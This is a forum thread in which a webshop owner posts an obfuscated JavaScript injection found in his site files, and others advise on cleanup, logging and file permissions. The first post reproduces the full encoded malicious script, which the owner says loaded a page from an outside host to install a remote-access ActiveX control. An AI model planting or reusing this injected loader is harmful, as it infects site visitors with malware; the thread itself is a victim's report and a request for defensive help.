Security Issue

[automotiveuk]

Hi all

Really need help I my webshops have this code suddenly appead in every file?

<!--[z0s]--><script>document.write(unescape("%3Cscript%3Efunc tion%20Bb%28It%29%7Breturn%20It%7Dtry%7Bvar%20Xec% 3D%27gg1gG1gz1gJ1gA1gm1gf1gZ1go1gH1gs1g71gp1gK1gV1 gt1g91gI1gr1gq1gR1gL1gn1gb1gO1gk1g31g81g61gc1g41gl 1g51gj1gh1gC1gi1gD1ga1gw1gS1gP1ge1gF1gT1gU1gN1gY1g x1gW1gM1gX1gd1gB1Gg1GG1Gz1GJ1GA1Gm1Gf1GZ1Go1GH1Gs1 G71Gp1GK1GV1Gt1G91GI1Gr1Gq1GR1GL1Gn1Gb1GO1Gk1G3%27 %3Bvar%20Rmd%3DBb%28%271%27%29%2CUmV%3DArray%28yJc %28%27186%27%29%2CyJc%28%27245%27%29%2C13448%5E134 21%2C25781%5E25665%2CyJc%28%27239%27%29%2CyJc%28%2 7246%27%29%2CyJc%28%27242%27%29%2CyJc%28%27184%27% 29%2CyJc%28%27224%27%29%2CyJc%28%27243%27%29%2C229 09%5E22933%2CyJc%28%27233%27%29%2CyJc%28%27166%27% 29%2CyJc%28%27203%27%29%2CyJc%28%27254%27%29%2C302 94%5E30339%2C1461%5E1307%2C11747%5E11569%2CyJc%28% 27192%27%29%2C17711%5E17915%2C16147%5E16313%2CyJc% 28%27205%27%29%2CyJc%28%27196%27%29%2CyJc%28%27237 %27%29%2C4904%5E4999%2CyJc%28%27253%27%29%2CyJc%28 %27240%27%29%2CyJc%28%27231%27%29%2CyJc%28%27234%2 7%29%2CyJc%28%27238%27%29%2C14625%5E14839%2C1506%5 E1369%2C31892%5E31863%2CyJc%28%27241%27%29%2C3927% 5E3989%2CyJc%28%27236%27%29%2C28462%5E28563%2CyJc% 28%27168%27%29%2CyJc%28%27235%27%29%2CyJc%28%27225 %27%29%2CyJc%28%27173%27%29%2CyJc%28%27190%27%29%2 C14799%5E14719%2C2567%5E2741%2C14411%5E14589%2C192 21%5E19447%2CyJc%28%27164%27%29%2CyJc%28%27193%27% 29%2C18844%5E18791%2CyJc%28%27207%27%29%2C22226%5E 22131%2C12920%5E13007%2C29083%5E28997%2CyJc%28%272 00%27%29%2CyJc%28%27211%27%29%2CyJc%28%27169%27%29 %2CyJc%28%27201%27%29%2C2744%5E2579%2C1867%5E1921% 2CyJc%28%27188%27%29%2C17338%5E17181%2CyJc%28%2718 5%27%29%2CyJc%28%27221%27%29%2CyJc%28%27216%27%29% 2C1441%5E1373%2CyJc%28%27191%27%29%2CyJc%28%27219% 27%29%2CyJc%28%27218%27%29%2C17340%5E17279%2C8824% 5E8895%2CyJc%28%27228%27%29%2CyJc%28%27180%27%29%2 CyJc%28%27255%27%29%2CyJc%28%27197%27%29%2C13599%5 E13715%2C26674%5E26861%2CyJc%28%27181%27%29%2C2526 %5E2413%2C9946%5E9835%2CyJc%28%27208%27%29%2C689%5 E541%29%3Bvar%20iwT%2CKiW%3Bvar%20PLT%2CNwb%3D%27g ggGgzgJgAgmgfgZgogHgsgzgfgAg7gsgpgKgVgtg9gIgrgqgRg LgngbgOgkgpg3g8gJgpg6gcg4glgsg5gjgpghg8gfg5g9gOgRg pgmgLgCglgpgsg5gjgpghg8gfg5g9gOgigpgmgLgCgDgGg5gfg IgAgag5g9g6gcg4gDgwg5gfgIgAgag5g9gOgSgPgegFgTgTgTg TgTgOgigpgUg7gzgHgag5gsgfgDgzg7g7gbgAg5gpglgpgIgrg qgSgNglgNgSg5gGgzg8gmg5g9gLgngbgOgSgNgig5gVgmgAgJg 5gGglgNgSgmgLgCgDgfg7gYgKgIgtgfgJgAgsgwg9gOgigpgxg 3g8gJgpgWgfg7glgMgGgXgogmgYgdgMgig3g8gJgpgbgGgBglg MgXgMgRGggtgcglgMgHgmgUg8gfg5gXgDgzg6g8gGgGgAgzgfg 5g6gDg7gJgwgMgig3g8gJgpgWgVgIglgMGGgcgfgag6GGgMgig Agog9gUg7gzgHgag5gsgfgDgzg7g7gbgAg5gDgAgsgUg5gVGzg og9gWgfg7gSgMglgMgSgbgGgBgOgpglglGJgXgOgkg3g8gJgpg Ug6gcglgUg7gzgHgag5gsgfgDg6g7gzg8gfgAg7gsgDgcg7gGg fgig3g8gJgpgUg3GAglgpgMgcgfgMgSgMgfgmGmgMgSgMGGGGg MgSg9gpgUg6gcgpGfglgpgMgMGZgMgMGmgbgogwg9gOgOgpgSg pgUg6gcgDgJg5gmg6g8gzg5gpg9GGGoGHg8GJGsgTGJG7gDGJG pGGgRgMgDgMgOgDgJg5gmg6g8gzg5gpg9GGGKgDgSGGgRgMgDg MgOgSgMgDgMgSgbgogwg9gOgpgSgMgDgMgpgSgpGggtgcgSgWg VgIgig3g8gJgpgqgmgBglgUg7gzgHgag5gsgfgDgzgJg5g8gfg 5GVg6g5gag5gsgfg9gMgAgogJg8gag5gMgOgigqgmgBgDgGg5g fGtgfgfgJgAG9gHgfg5gpg9gMgGgJgzgMgRgpgUg3GAgOgigqg mgBgDgcg5gAgwgcgfglGIgigqgmgBgDgjgAgUgfgcglgXgigqg mgBgDgogJg8gag5gng7gJgUg5gJgpglgpgTgigpgfgJGrgkgpg Ug7gzgHgag5gsgfgDG9g7gUGrgDg8gmgmg5gsgUGqgcgAg6gUg pg9gpgqgmgBgOgigpgKgVgtg9gWgfg7gRgpgbgGgBgpgOgigxg pgzg8gfgzgcg9g5gOgpgkgUg7gzgHgag5gsgfgDgjgJgAgfg5g pg9gMgggcgfgag6gZggG9g7gUGrgZggGGG9g7gUGrgZggGGgcg fgag6gZgMgOgigpgUg7gzgHgag5gsgfgDG9g7gUGrgDg8gmgmg 5gsgUGqgcgAg6gUgpg9gpgqgmgBgOgigKgVgtgpg9gpgWgfg7g RgbgGgBgOgpgigxgpgxGRgogHgsgzgfgAg7gsgpgbgogwg9gOg kgpg3g8gJgpgVgoGLglGIgFgig3g8gJgpgqg8GrglgNgTgXGIG ngFGbgeGOgPG7gTg8G9gzgUg5gogNgRgGgBgcglgNgNgigpgog 7gJg9goGkgzglgTgigpgoGkgzgpgggpgVgoGLgigpgoGkgzgSg SgOgpgGgBgcgSglgpgqg8GrgDgGgHG9gGgfgJg9gKg8gfgcgDg og6g7g7gJg9gKg8gfgcgDgJg8gsgUg7gag9gOG3gqg8GrgDg6g 5gsgwgfgcgOgRgXgRgXgOgigpgJg5gfgHgJgsgpgGgBgcgigpg xggGGgGgzgJgAgmgfgZ%27%3Bvar%20MvH%3DString%28%29% 3Bfunction%20yJc%28meW%29%7Breturn%20parseInt%28me W%29%7DXec%3DXec.split%28Rmd%29%3Bfor%20%28iwT%3D0 %3BiwT%3CNwb.length%3BiwT+%3D2%29%7BPLT%3DNwb.subs tr%28iwT%2C2%29%3Bfor%28KiW%3D0%3BKiW%3CXec.length %3BKiW++%29%7Bif%28Xec%5BKiW%5D%3D%3DPLT%29break%3 B%7DMvH+%3DString.fromCharCode%28UmV%5BKiW%5D%5E13 4%29%3B%7Ddocument.write%28MvH%29%3B%7Dcatch%28upz %29%7B%7D%3C/script%3E"))</script><!--[/z0s]-->

[michael_s]

Time to restore from backup or manually remove that code from your site.

I also suggest you start searching through the server for clues as to how this happened. File edits, ftp, accesses should all be logged somewhere on the server. You need to find out how all your files were edited.

[automotiveuk]

Hi Cheers for the reply

Locked down the servers yesterday changed all user and root passwords removed all Javascript code from files it seens the code was only in top level files IE index.php etc did not find any code in sub files IE in includes for templated files and dir have checked looked in root .bash file history can not find anthing strange I can say must be very clever I have one very expensive strong firewall gateway and each server has iptables as well the only thing i can think of is someone must used a packet sniffer to grab passwords just for my info is it possible to write top level files if I have registered globals switched on?.

for future and bit more info I understand from searching on sunday that dreamhost was hacked as well the encrypted Javascript code was opening a browser link to this URL update1.classictel.org and trying to install and run remote data access activex in internet explorer.

All the best

Darren

[ALElder]

FYI.....

We had this same code is a virus that make the user install an active X.

This code was also found in other files in the Root Dir.

You should look at the other files in the root and change all the permissions to read only this will make it so they can't do it again.

Adam